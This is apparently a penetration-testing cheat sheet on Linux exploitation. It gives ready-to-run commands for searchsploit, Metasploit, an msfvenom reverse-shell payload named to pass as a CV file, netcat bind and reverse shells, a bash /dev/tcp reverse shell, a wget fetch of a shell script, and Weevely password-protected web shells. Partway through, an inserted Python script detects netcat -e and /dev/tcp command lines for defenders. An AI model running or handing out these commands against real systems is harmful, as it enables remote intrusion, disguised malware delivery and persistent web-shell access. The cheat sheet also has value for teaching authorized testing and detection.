1.5-Linux-Exploitation.md

Pre-Intrusion phase (Linux)

Exploitation

Searchsploit

searchsploit <keyword>
  • -m: mirror download the exploit
  • -u: show url to its CVE
  • -x: view the file
  • -p: view path of file

Fixing requests library errors under Python 2

git clone https://github.com/kennethreitz/requests
cd requests && python setup.py install
pip3 install --force-reinstall requests
pip3 install --ignore-installed requests

Metasploit

msfconsole

MsfVenom

# Reverse malware
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe -o cv-username.exe
# listener
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 'listening port'; exploit"

Python HTTP Server

python3 -m http.server
wget <your_ip>:8000/rev.sh

Netcat

connect

# attacker: run first
nc -lvnp 4444
# client: run second
nc <rhost> 4444
  • -l: Listen
  • -v: Verbose
  • -n: Do not use DNS
  • -p: What port to listen on

bind shell

# client: run first
nc -lvnp 4444 -e "/bin/bash -i"
# attacker: run second
nc <rhost> 4444

reverse shell

# attacker: run first
nc -lvnp 4444
# client: run second
nc <rhost> 4444 -e "/bin/bash -i"

Bash

# reverse shell
bash -i >& /dev/tcp/<your_ip>/4444 0>&1
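
A defender-side check for the Netcat and Bash one-liners above, added here as an example and not part of the original notes: it flags process command lines that use netcat's `-e` option or a `/dev/tcp` redirection, and tells bind from reverse use by the presence of `-l`. The sample log lines, addresses, and the names `classify` and `scan` are constructed for illustration.

```python
import os
import re
import shlex

# Constructed process command lines, shaped like the fields an execve audit
# trail or EDR process log records (addresses and hosts are placeholders).
SAMPLE_CMDLINES = [
    'nc -lvnp 4444 -e "/bin/bash -i"',
    "nc 192.0.2.10 4444 -e /bin/bash",
    "bash -c 'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1'",
    "nc -zv db.internal.example 5432",   # benign port check
    "bash -i",                           # interactive shell, no network
    "python3 -m http.server",
]

NETCAT = {"nc", "ncat", "netcat", "nc.traditional"}
# Bash-only pseudo-device: /dev/tcp/<host>/<port> opens a socket on redirect.
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")


def classify(cmdline):
    """Return a list of findings for one command line (empty means clean)."""
    findings = []
    if DEV_TCP.search(cmdline):
        findings.append("bash /dev/tcp redirection")
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes, e.g. a truncated log field
        argv = cmdline.split()
    if argv and os.path.basename(argv[0]) in NETCAT:
        # Expand clustered short options: "-lvnp" -> {l, v, n, p}
        short = {ch for a in argv[1:]
                 if a.startswith("-") and not a.startswith("--")
                 for ch in a[1:]}
        if "e" in short or "--exec" in argv:
            # -l with -e serves a shell locally (bind); without -l it dials out.
            kind = "bind" if "l" in short or "--listen" in argv else "reverse"
            findings.append(f"netcat -e ({kind} shell)")
    return findings


def scan(cmdlines):
    """Map each suspicious command line to its findings."""
    return {c: f for c in cmdlines if (f := classify(c))}


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES).items():
        print(f"{', '.join(hits):32} {cmd}")
```

Redirections such as `>& /dev/tcp/...` are not part of a process's argv, so that rule only fires on logged shell strings (`bash -c '...'`, history files, script contents); pair it with network telemetry for shells launched interactively.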

Weevely

Weaponized web shell with password

weevely generate s3cr3t shell.php
weevely http://192.168.1.202/shell.php s3cr3t